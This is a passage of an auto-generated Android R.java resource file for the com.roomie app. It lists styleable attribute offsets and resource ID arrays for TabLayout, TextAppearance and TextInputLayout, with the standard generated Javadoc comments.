com.roomie.R.attr#tabIconTintMode} attribute's value can be found in the {@link #TabLayout} array. <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>src_over</code></td><td>3</td><td></td></tr> <tr><td><code>src_in</code></td><td>5</td><td></td></tr> <tr><td><code>src_atop</code></td><td>9</td><td></td></tr> <tr><td><code>multiply</code></td><td>14</td><td></td></tr> <tr><td><code>screen</code></td><td>15</td><td></td></tr> <tr><td><code>add</code></td><td>16</td><td></td></tr> </table> @attr name com.roomie:tabIconTintMode */ public static final int TabLayout_tabIconTintMode = 22; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#tabIndicator} attribute's value can be found in the {@link #TabLayout} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:tabIndicator */ public static final int TabLayout_tabIndicator = 4; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#tabIndicatorAnimationDuration} attribute's value can be found in the {@link #TabLayout} array. <p>Must be an integer value, such as "<code>100</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:tabIndicatorAnimationDuration */ public static final int TabLayout_tabIndicatorAnimationDuration = 6; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#tabIndicatorColor} attribute's value can be found in the {@link #TabLayout} array. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:tabIndicatorColor */ public static final int TabLayout_tabIndicatorColor = 0; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#tabIndicatorFullWidth} attribute's value can be found in the {@link #TabLayout} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:tabIndicatorFullWidth */ public static final int TabLayout_tabIndicatorFullWidth = 7; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#tabIndicatorGravity} attribute's value can be found in the {@link #TabLayout} array. <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>bottom</code></td><td>0</td><td></td></tr> <tr><td><code>center</code></td><td>1</td><td></td></tr> <tr><td><code>top</code></td><td>2</td><td></td></tr> <tr><td><code>stretch</code></td><td>3</td><td></td></tr> </table> @attr name com.roomie:tabIndicatorGravity */ public static final int TabLayout_tabIndicatorGravity = 5; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#tabIndicatorHeight} attribute's value can be found in the {@link #TabLayout} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:tabIndicatorHeight */ public static final int TabLayout_tabIndicatorHeight = 1; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#tabInlineLabel} attribute's value can be found in the {@link #TabLayout} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:tabInlineLabel */ public static final int TabLayout_tabInlineLabel = 10; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#tabMaxWidth} attribute's value can be found in the {@link #TabLayout} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:tabMaxWidth */ public static final int TabLayout_tabMaxWidth = 12; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#tabMinWidth} attribute's value can be found in the {@link #TabLayout} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:tabMinWidth */ public static final int TabLayout_tabMinWidth = 11; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#tabMode} attribute's value can be found in the {@link #TabLayout} array. <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>scrollable</code></td><td>0</td><td></td></tr> <tr><td><code>fixed</code></td><td>1</td><td></td></tr> </table> @attr name com.roomie:tabMode */ public static final int TabLayout_tabMode = 8; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#tabPadding} attribute's value can be found in the {@link #TabLayout} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:tabPadding */ public static final int TabLayout_tabPadding = 20; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#tabPaddingBottom} attribute's value can be found in the {@link #TabLayout} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:tabPaddingBottom */ public static final int TabLayout_tabPaddingBottom = 19; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#tabPaddingEnd} attribute's value can be found in the {@link #TabLayout} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:tabPaddingEnd */ public static final int TabLayout_tabPaddingEnd = 18; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#tabPaddingStart} attribute's value can be found in the {@link #TabLayout} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:tabPaddingStart */ public static final int TabLayout_tabPaddingStart = 16; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#tabPaddingTop} attribute's value can be found in the {@link #TabLayout} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:tabPaddingTop */ public static final int TabLayout_tabPaddingTop = 17; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#tabRippleColor} attribute's value can be found in the {@link #TabLayout} array. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:tabRippleColor */ public static final int TabLayout_tabRippleColor = 23; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#tabSelectedTextColor} attribute's value can be found in the {@link #TabLayout} array. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:tabSelectedTextColor */ public static final int TabLayout_tabSelectedTextColor = 15; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#tabTextAppearance} attribute's value can be found in the {@link #TabLayout} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:tabTextAppearance */ public static final int TabLayout_tabTextAppearance = 13; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#tabTextColor} attribute's value can be found in the {@link #TabLayout} array. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:tabTextColor */ public static final int TabLayout_tabTextColor = 14; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#tabUnboundedRipple} attribute's value can be found in the {@link #TabLayout} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:tabUnboundedRipple */ public static final int TabLayout_tabUnboundedRipple = 24; /** Attributes that can be used with a TextAppearance. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #TextAppearance_android_fontFamily android:fontFamily}</code></td><td></td></tr> <tr><td><code>{@link #TextAppearance_android_shadowColor android:shadowColor}</code></td><td></td></tr> <tr><td><code>{@link #TextAppearance_android_shadowDx android:shadowDx}</code></td><td></td></tr> <tr><td><code>{@link #TextAppearance_android_shadowDy android:shadowDy}</code></td><td></td></tr> <tr><td><code>{@link #TextAppearance_android_shadowRadius android:shadowRadius}</code></td><td></td></tr> <tr><td><code>{@link #TextAppearance_android_textColor android:textColor}</code></td><td></td></tr> <tr><td><code>{@link #TextAppearance_android_textColorHint android:textColorHint}</code></td><td></td></tr> <tr><td><code>{@link #TextAppearance_android_textColorLink android:textColorLink}</code></td><td></td></tr> <tr><td><code>{@link #TextAppearance_android_textSize android:textSize}</code></td><td></td></tr> <tr><td><code>{@link #TextAppearance_android_textStyle android:textStyle}</code></td><td></td></tr> <tr><td><code>{@link #TextAppearance_android_typeface android:typeface}</code></td><td></td></tr> <tr><td><code>{@link #TextAppearance_fontFamily com.roomie:fontFamily}</code></td><td> The attribute for the font family.</td></tr> <tr><td><code>{@link #TextAppearance_textAllCaps com.roomie:textAllCaps}</code></td><td> Present the text in ALL CAPS.</td></tr> </table> @see #TextAppearance_android_fontFamily @see #TextAppearance_android_shadowColor @see #TextAppearance_android_shadowDx @see #TextAppearance_android_shadowDy @see #TextAppearance_android_shadowRadius @see #TextAppearance_android_textColor @see #TextAppearance_android_textColorHint @see #TextAppearance_android_textColorLink @see #TextAppearance_android_textSize @see #TextAppearance_android_textStyle @see #TextAppearance_android_typeface @see #TextAppearance_fontFamily @see #TextAppearance_textAllCaps */ public static final int[] TextAppearance = { 0x01010095, 0x01010096, 0x01010097, 0x01010098, 0x0101009a, 0x0101009b, 0x01010161, 0x01010162, 0x01010163, 0x01010164, 0x010103ac, 0x7f010057, 0x7f01005d }; /** <p>This symbol is the offset where the {@link android.R.attr#fontFamily} attribute's value can be found in the {@link #TextAppearance} array. @attr name android:fontFamily */ public static final int TextAppearance_android_fontFamily = 10; /** <p>This symbol is the offset where the {@link android.R.attr#shadowColor} attribute's value can be found in the {@link #TextAppearance} array. @attr name android:shadowColor */ public static final int TextAppearance_android_shadowColor = 6; /** <p>This symbol is the offset where the {@link android.R.attr#shadowDx} attribute's value can be found in the {@link #TextAppearance} array. @attr name android:shadowDx */ public static final int TextAppearance_android_shadowDx = 7; /** <p>This symbol is the offset where the {@link android.R.attr#shadowDy} attribute's value can be found in the {@link #TextAppearance} array. @attr name android:shadowDy */ public static final int TextAppearance_android_shadowDy = 8; /** <p>This symbol is the offset where the {@link android.R.attr#shadowRadius} attribute's value can be found in the {@link #TextAppearance} array. @attr name android:shadowRadius */ public static final int TextAppearance_android_shadowRadius = 9; /** <p>This symbol is the offset where the {@link android.R.attr#textColor} attribute's value can be found in the {@link #TextAppearance} array. @attr name android:textColor */ public static final int TextAppearance_android_textColor = 3; /** <p>This symbol is the offset where the {@link android.R.attr#textColorHint} attribute's value can be found in the {@link #TextAppearance} array. @attr name android:textColorHint */ public static final int TextAppearance_android_textColorHint = 4; /** <p>This symbol is the offset where the {@link android.R.attr#textColorLink} attribute's value can be found in the {@link #TextAppearance} array. @attr name android:textColorLink */ public static final int TextAppearance_android_textColorLink = 5; /** <p>This symbol is the offset where the {@link android.R.attr#textSize} attribute's value can be found in the {@link #TextAppearance} array. @attr name android:textSize */ public static final int TextAppearance_android_textSize = 0; /** <p>This symbol is the offset where the {@link android.R.attr#textStyle} attribute's value can be found in the {@link #TextAppearance} array. @attr name android:textStyle */ public static final int TextAppearance_android_textStyle = 2; /** <p>This symbol is the offset where the {@link android.R.attr#typeface} attribute's value can be found in the {@link #TextAppearance} array. @attr name android:typeface */ public static final int TextAppearance_android_typeface = 1; /** <p> @attr description The attribute for the font family. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:fontFamily */ public static final int TextAppearance_fontFamily = 12; /** <p> @attr description Present the text in ALL CAPS. This may use a small-caps form when available. <p>May be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>May be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This is a private symbol. @attr name com.roomie:textAllCaps */ public static final int TextAppearance_textAllCaps = 11; /** Attributes that can be used with a TextInputLayout. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #TextInputLayout_android_hint android:hint}</code></td><td></td></tr> <tr><td><code>{@link #TextInputLayout_android_textColorHint android:textColorHint}</code></td><td></td></tr> <tr><td><code>{@link #TextInputLayout_boxBackgroundColor com.roomie:boxBackgroundColor}</code></td><td></td></tr> <tr><td><code>{@link #TextInputLayout_boxBackgroundMode com.roomie:boxBackgroundMode}</code></td><td></td></tr> <tr><td><code>{@link #TextInputLayout_boxCollapsedPaddingTop com.roomie:boxCollapsedPaddingTop}</code></td><td></td></tr> <tr><td><code>{@link #TextInputLayout_boxCornerRadiusBottomEnd com.roomie:boxCornerRadiusBottomEnd}</code></td><td></td></tr> <tr><td><code>{@link #TextInputLayout_boxCornerRadiusBottomStart com.roomie:boxCornerRadiusBottomStart}</code></td><td></td></tr> <tr><td><code>{@link #TextInputLayout_boxCornerRadiusTopEnd com.roomie:boxCornerRadiusTopEnd}</code></td><td></td></tr> <tr><td><code>{@link #TextInputLayout_boxCornerRadiusTopStart com.roomie:boxCornerRadiusTopStart}</code></td><td></td></tr> <tr><td><code>{@link #TextInputLayout_boxStrokeColor com.roomie:boxStrokeColor}</code></td><td></td></tr> <tr><td><code>{@link #TextInputLayout_boxStrokeWidth com.roomie:boxStrokeWidth}</code></td><td></td></tr> <tr><td><code>{@link #TextInputLayout_counterEnabled com.roomie:counterEnabled}</code></td><td></td></tr> <tr><td><code>{@link #TextInputLayout_counterMaxLength com.roomie:counterMaxLength}</code></td><td></td></tr> <tr><td><code>{@link #TextInputLayout_counterOverflowTextAppearance com.roomie:counterOverflowTextAppearance}</code></td><td></td></tr> <tr><td><code>{@link #TextInputLayout_counterTextAppearance com.roomie:counterTextAppearance}</code></td><td></td></tr> <tr><td><code>{@link #TextInputLayout_errorEnabled com.roomie:errorEnabled}</code></td><td></td></tr> <tr><td><code>{@link #TextInputLayout_errorTextAppearance com.roomie:errorTextAppearance}</code></td><td></td></tr> <tr><td><code>{@link #TextInputLayout_helperText com.roomie:helperText}</code></td><td></td></tr> <tr><td><code>{@link #TextInputLayout_helperTextEnabled com.roomie:helperTextEnabled}</code></td><td></td></tr> <tr><td><code>{@link #TextInputLayout_helperTextTextAppearance com.roomie:helperTextTextAppearance}</code></td><td></td></tr> <tr><td><code>{@link #TextInputLayout_hintAnimationEnabled com.roomie:hintAnimationEnabled}</code></td><td></td></tr> <tr><td><code>{@link #TextInputLayout_hintEnabled com.roomie:hintEnabled}</code></td><td></td></tr> <tr><td><code>{@link #TextInputLayout_hintTextAppearance com.roomie:hintTextAppearance}</code></td><td></td></tr> <tr><td><code>{@link #TextInputLayout_passwordToggleContentDescription com.roomie:passwordToggleContentDescription}</code></td><td></td></tr> <tr><td><code>{@link #TextInputLayout_passwordToggleDrawable com.roomie:passwordToggleDrawable}</code></td><td></td></tr> <tr><td><code>{@link #TextInputLayout_passwordToggleEnabled com.roomie:passwordToggleEnabled}</code></td><td></td></tr> <tr><td><code>{@link #TextInputLayout_passwordToggleTint com.roomie:passwordToggleTint}</code></td><td></td></tr> <tr><td><code>{@link #TextInputLayout_passwordToggleTintMode com.roomie:passwordToggleTintMode}</code></td><td></td></tr> </table> @see #TextInputLayout_android_hint @see #TextInputLayout_android_textColorHint @see #TextInputLayout_boxBackgroundColor @see #TextInputLayout_boxBackgroundMode @see #TextInputLayout_boxCollapsedPaddingTop @see #TextInputLayout_boxCornerRadiusBottomEnd @see #TextInputLayout_boxCornerRadiusBottomStart @see #TextInputLayout_boxCornerRadiusTopEnd @see #TextInputLayout_boxCornerRadiusTopStart @see #TextInputLayout_boxStrokeColor @see #TextInputLayout_boxStrokeWidth @see #TextInputLayout_counterEnabled @see #TextInputLayout_counterMaxLength @see #TextInputLayout_counterOverflowTextAppearance @see #TextInputLayout_counterTextAppearance @see #TextInputLayout_errorEnabled @see #TextInputLayout_errorTextAppearance @see #TextInputLayout_helperText @see #TextInputLayout_helperTextEnabled @see #TextInputLayout_helperTextTextAppearance @see #TextInputLayout_hintAnimationEnabled @see #TextInputLayout_hintEnabled @see #TextInputLayout_hintTextAppearance @see #TextInputLayout_passwordToggleContentDescription @see #TextInputLayout_passwordToggleDrawable @see #TextInputLayout_passwordToggleEnabled @see #TextInputLayout_passwordToggleTint @see #TextInputLayout_passwordToggleTintMode */ public static final int[] TextInputLayout = { 0x0101009a, 0x01010150, 0x7f0101c0, 0x7f0101c1, 0x7f0101c2, 0x7f0101c3, 0x7f0101c4, 0x7f0101c5, 0x7f0101c6, 0x7f0101c7, 0x7f0101c8, 0x7f0101c9, 0x7f0101ca, 0x7f0101cb, 0x7f0101cc, 0x7f0101cd, 0x7f0101ce, 0x7f0101cf, 0x7f0101d0, 0x7f0101d1, 0x7f0101d2, 0x7f0101d3, 0x7f0101d4, 0x7f0101d5, 0x7f0101d6, 0x7f0101d7, 0x7f0101d8, 0x7f0101d9 }; /** <p>This symbol is the offset where the {@link android.R.attr#hint} attribute's value can be found in the {@link #TextInputLayout} array. @attr name android:hint */ public static final int TextInputLayout_android_hint = 1; /** <p>This symbol is the offset where the {@link android.R.attr#textColorHint} attribute's value can be found in the {@link #TextInputLayout} array. @attr name android:textColorHint */ public static final int TextInputLayout_android_textColorHint = 0; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#boxBackgroundColor} attribute's value can be found in the {@link #TextInputLayout} array. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:boxBackgroundColor */ public static final int TextInputLayout_boxBackgroundColor = 26; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#boxBackgroundMode} attribute's value can be found in the {@link #TextInputLayout} array. <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>none</code></td><td>0</td><td></td></tr> <tr><td><code>filled</code></td><td>1</td><td></td></tr> <tr><td><code>outline</code></td><td>2</td><td></td></tr> </table> @attr name com.roomie:boxBackgroundMode */ public static final int TextInputLayout_boxBackgroundMode = 19; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#boxCollapsedPaddingTop} attribute's value can be found in the {@link #TextInputLayout} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:boxCollapsedPaddingTop */ public static final int TextInputLayout_boxCollapsedPaddingTop = 20; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#boxCornerRadiusBottomEnd} attribute's value can be found in the {@link #TextInputLayout} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:boxCornerRadiusBottomEnd */ public static final int TextInputLayout_boxCornerRadiusBottomEnd = 24; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#boxCornerRadiusBottomStart} attribute's value can be found in the {@link #TextInputLayout} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:boxCornerRadiusBottomStart */ public static final int TextInputLayout_boxCornerRadiusBottomStart = 23; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#boxCornerRadiusTopEnd} attribute's value can be found in the {@link #TextInputLayout} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:boxCornerRadiusTopEnd */ public static final int TextInputLayout_boxCornerRadiusTopEnd = 22; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#boxCornerRadiusTopStart} attribute's value can be found in the {@link #TextInputLayout} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:boxCornerRadiusTopStart */ public static final int TextInputLayout_boxCornerRadiusTopStart = 21; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#boxStrokeColor} attribute's value can be found in the {@link #TextInputLayout} array. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:boxStrokeColor */ public static final int TextInputLayout_boxStrokeColor = 25; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#boxStrokeWidth} attribute's value can be found in the {@link #TextInputLayout} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:boxStrokeWidth */ public static final int TextInputLayout_boxStrokeWidth = 27; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#counterEnabled} attribute's value can be found in the {@link #TextInputLayout} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:counterEnabled */ public static final int TextInputLayout_counterEnabled = 10; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#counterMaxLength} attribute's value can be found in the {@link #TextInputLayout} array. <p>Must be an integer value, such as "<code>100</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:counterMaxLength */ public static final int TextInputLayout_counterMaxLength = 11; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#counterOverflowTextAppearance} attribute's value can be found in the {@link #TextInputLayout} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:counterOverflowTextAppearance */ public static final int TextInputLayout_counterOverflowTextAppearance = 13; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#counterTextAppearance} attribute's value can be found in the {@link #TextInputLayout} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:counterTextAppearance */ public static final int TextInputLayout_counterTextAppearance = 12; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#errorEnabled} attribute's value can be found in the {@link #TextInputLayout} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:errorEnabled */ public static final int TextInputLayout_errorEnabled = 8; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#errorTextAppearance} attribute's value can be found in the {@link #TextInputLayout} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:errorTextAppearance */ public static final int TextInputLayout_errorTextAppearance = 9; 